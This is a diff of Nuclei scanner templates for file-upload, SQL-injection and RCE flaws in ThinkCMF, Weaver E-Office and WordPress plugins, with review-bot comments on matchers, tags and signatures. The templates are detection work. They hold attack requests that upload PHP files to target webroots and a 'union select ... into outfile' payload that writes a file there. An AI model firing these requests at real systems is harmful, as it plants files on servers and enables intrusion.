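Review bot: `string` is now the constant `secgate-3600-file-upload`, but the same variable is also the multipart boundary at L823 (`------WebKitFormBoundary{{string}}`), so every request this template sends carries a boundary that spells out the template name — a trivially signature-able artifact. Keep `string` for the marker and give the boundary its own random variable, following the `filename: "{{rand_base(6)}}"` pattern already here. `file-upload: "{{rand_base(5)}}"` at L814 looks orphaned once the `contains(body_2,'{{file-upload}}')` check is gone; remove it if nothing else references it. The tag list at L810 still uses `file-upload`, whereas the ruijie template in this commit was normalized to `fileupload`.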
@@ -37,7 +37,7 @@ http:
Content-Disposition: form-data; name="upfile"; filename="{(unknown)}.php"
Content-Type: text/plain
-
+
------WebKitFormBoundary{{string}}
Content-Disposition: form-data; name="submit_post"
@@ -54,11 +54,9 @@ http:
matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - status_code_2 == 200
- - contains(body_2,'{{file-upload}}')
- - contains(header_2,'text/html')
- condition: and
+ - type: word
+ part: body
+ words:
+ - '{{md5(string)}}'
# digest: 490a00463044022000f7a446804d16688a2e6bd0ecb4c39abb59795da8559f0eff1c5c086fccd253022048085bb0719b371f98e0f447f501fa1b27dd721f6314c35ff9c42c22058b1d93:922c64590222798bb761d5b6d8e72950
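Review bot: The replacement matcher at L834-L837 uses `part: body` with no index, whereas the DSL it replaces pinned `body_2`; with two requests the marker is only expected in the second response, so `part: body_2` keeps the check as precise as before and matches how the other templates in this commit were written. `matchers-condition: and` at L826 now governs a single matcher.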
diff --git a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
index 8e218e585c..50daa13856 100644
--- a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
+++ b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
@@ -15,21 +15,22 @@ info:
max-request: 2
tags: thinkcmf,rce,intrusive
+variables:
+ string: "thinkcmf-rce"
+
http:
- raw:
- |
- GET /index.php?a=fetch&content={{url_encode('
+
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile"
@@ -59,10 +60,10 @@ http:
- type: word
part: body_2
words:
- - '{{md5(num)}}'
+ - '{{md5(string)}}'
- type: status
status:
- 200
-# digest: 4a0a00473045022100e53af2a9b597177c6590d5421bd6fed3519580906d268c42829a6900818c1bc902202ed7ad372d48b979e5b41259401514d376746f5bce485696a84f4c387845d04b:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e53af2a9b597177c6590d5421bd6fed3519580906d268c42829a6900818c1bc902202ed7ad372d48b979e5b41259401514d376746f5bce485696a84f4c387845d04b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
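Review bot: L865-L866 replace the `# digest:` line with a copy that differs only in invisible characters (whitespace or line ending), yet the template body changed in this commit, so the signature no longer covers the content. Unless the repository's signing workflow regenerates it on merge, the template needs to be re-signed; if the whitespace change was unintentional, drop it so the hunk is limited to the matcher change at L860-L861. The `num` variable the old matcher referenced should be removed from `variables` if nothing else uses it; that block is not visible in this hunk.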
diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
index dd6992c352..88ea4b04eb 100755
--- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
@@ -14,9 +14,11 @@ info:
max-request: 2
fofa-query: app="泛微-EOffice"
tags: weaver,e-office,oa,sqli
+
variables:
filename: "{{to_lower(rand_base(5))}}"
- payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{(unknown)}.php']"
+ string: "weaver-group-xml-sqli"
+ payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{(unknown)}.php']"
http:
- raw:
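Review bot: This template drops a PHP file into the webroot via `INTO OUTFILE` (payload at L881) and then fetches it, yet the tag list at L875 is `weaver,e-office,oa,sqli` with no `intrusive` tag, so it will run under tag filters meant to exclude intrusive templates — every other webshell-dropping template in this commit carries `intrusive`. Add `intrusive,rce` to the tags.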
@@ -33,7 +35,7 @@ http:
- type: word
part: body_2
words:
- - "758058d8987e7a9ec723bcdbec6c407e"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
index 10a49577d8..281bba93fc 100755
--- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
@@ -14,7 +14,7 @@ info:
tags: weaver,e-office,intrusive,rce,file-upload
variables:
filename: "{{to_lower(rand_base(5))}}"
- string: "{{randstr}}"
+ string: "weaver-lazyuploadify-file-upload"
http:
- raw:
@@ -33,7 +33,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{(unknown)}.php"
Content-Type: application/octet-stream
-
+
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1
@@ -58,8 +58,11 @@ http:
matchers:
- type: dsl
dsl:
- - "status_code_1 == 200"
- "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')"
- - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
condition: and
+
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
# digest: 4b0a00483046022100b1ecbee09f268b25db456fc80be7fb4e0436700a30c52c333959bad8e6396eaa022100ecdc3c2a0b7b463361a617fa59de8766cc175aa00c02f53aab647db22bf0b837:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
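Review bot: Adding the word matcher at L921-L924 next to the retained dsl matcher gives the template two matchers, and unless a `matchers-condition: and` sits above L913 (outside this hunk) nuclei's default is OR, so the upload-success JSON check on body_2 alone would flag a target even when the PHP never executed. If it is absent, add `matchers-condition: and` above `matchers:`. Dropping `status_code_1 == 200` and the `status_code_3` check is fine given the md5 marker in body_3.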
diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
index d3ff23d34f..e829492050 100755
--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@@ -15,6 +15,7 @@ info:
tags: weaver,e-office,oa,rce,intrusive,fileupload
variables:
filename: "{{to_lower(rand_base(5))}}"
+ string: "weaver-office-server-file-upload"
http:
- raw:
@@ -30,7 +31,7 @@ http:
Content-Disposition: form-data;name="FileData";filename="{(unknown)}.php"
Content-Type: application/octet-stream
- '
+
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition: form-data;name="FormData"
@@ -46,7 +47,7 @@ http:
- type: word
part: body_2
words:
- - "758058d8987e7a9ec723bcdbec6c407e"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
index d45c97663a..aecbefe3ce 100755
--- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
@@ -11,10 +11,11 @@ info:
verified: true
max-request: 3
fofa-query: app="泛微-EOffice"
- tags: weaver,e-office,oa,instrusive,rce,intrusive
+ tags: weaver,e-office,oa,intrusive,rce,intrusive,fileupload
+
variables:
filename: "{{to_lower(rand_base(5))}}"
- string: "{{randstr}}"
+ string: "weaver-uploadify-file-upload"
http:
- raw:
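Review bot: The tag list at L962 now contains `intrusive` twice (`oa,intrusive,rce,intrusive,fileupload`): the typo `instrusive` was fixed but the pre-existing `intrusive` was kept. Drop one: `tags: weaver,e-office,oa,intrusive,rce,fileupload`.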
@@ -33,7 +34,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{(unknown)}.php"
Content-Type: application/octet-stream
-
+
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/personal/_temp.php HTTP/1.1
@@ -43,8 +44,11 @@ http:
matchers:
- type: dsl
dsl:
- - "status_code_1 == 200"
- "contains(body_2, 'imageSrc') && contains(body_2, 'height')"
- - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
condition: and
+
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
# digest: 4b0a00483046022100b9ada8f5c9c7c9375352c42246f9fb09f686f69dd499c02fe7b5ebb77c3d48d9022100e417a1341b83b7240f1c5a0bf814d5b9931112064dc0317b19fd6f0e2647a6c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
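Review bot: With the word matcher added at L987-L990 beside the retained dsl matcher, the template has two matchers, and unless a `matchers-condition: and` exists above L979 (outside this hunk) the default is OR, so `contains(body_2, 'imageSrc') && contains(body_2, 'height')` — an upload-accepted response — would be enough to report the host vulnerable without the PHP running. If it is absent, add `matchers-condition: and` above `matchers:`. The fetch of `/attachment/personal/_temp.php` at L977 is the response the md5 marker should be in, which `part: body_3` correctly targets.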
diff --git a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
index b55e8d7816..b5f0e2839e 100644
--- a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
@@ -19,6 +19,9 @@ info:
max-request: 2
tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
+variables:
+ string: "3dprint-arbitrary-file-upload"
+
http:
- raw:
- |
@@ -35,18 +38,16 @@ http:
Content-Disposition: form-data; name="file"; filename={{randstr}}.php
Content-Type: text/php
-
+
-----------------------------54331109111293931601238262353--
- |
GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - 'contains(header_2, "text/html")'
- - "status_code_2 == 200"
- - "contains(body_2, '3DPrint-arbitrary-file-upload')"
- condition: and
+ - type: word
+ part: body_2
+ words:
+ - '{{md5(string)}}'
# digest: 490a0046304402204014e03adf59b73d5219aa2cf87a8a95ae9a277a296473ccbfb68c7d86e10fce022023c5fa1f1eee7bce47ce0038c7bb17f30859773a2017a1db43e095fb48f8a3d0:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
index 5e3e29dfe7..f32849cbf2 100644
--- a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
+++ b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
@@ -17,6 +17,9 @@ info:
max-request: 2
tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive
+variables:
+ string: "ait-csv-import-export-rce"
+
http:
- raw:
- |
@@ -29,7 +32,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
- sep=;
+ sep=;
--------------------------ab360007dbae2de8--
- |
@@ -39,12 +42,8 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- - "fe394b60dc324c3bac3060d600ad4349"
-
- - type: status
- status:
- - 200
+ - '{{md5(string)}}'
# digest: 490a004630440220644f99faec006ef48de167e6e9a5c70b704d0a180dfac6ac88341eb2dcecc7780220396204420fb32c1f832b3e122af2ba85db50e034b7ffbb70e1dee8fb7752a18f:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
index 1628c63cf5..ad31b680f3 100644
--- a/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
+++ b/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
@@ -15,8 +15,10 @@ info:
metadata:
max-request: 3
tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload
+
variables:
filepath: '{{rand_base(7, "abcdefghi")}}'
+ string: "wordpress-rce-simplefilelist"
http:
- raw:
@@ -46,7 +48,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{filepath}}.png"
Content-Type: image/png
-
+
--6985fa39c0698d07f6d418b37388e1b2--
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
@@ -63,12 +65,9 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_3
words:
- - "aa5be3e9dec96f2f1a593b2f5b2288af"
- - "PHP Version"
- - "Configuration Command"
- condition: and
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
index ad34959adf..9fc48b1972 100644
--- a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
+++ b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
@@ -14,11 +14,13 @@ info:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/kadence-blocks/"
- tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,file-upload,intrusive
+ tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,fileupload,intrusive
+
variables:
str: "{{to_lower(rand_text_alpha(5))}}"
email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
filename: "{{to_lower(rand_text_alpha(5))}}"
+ string: "wp-kadence-blocks-rce"
http:
- raw:
@@ -48,7 +50,7 @@ http:
GIF89a
-
+
-----------------------------8779924633391890046425977712
Content-Disposition: form-data; name="_kb_adv_form_post_id"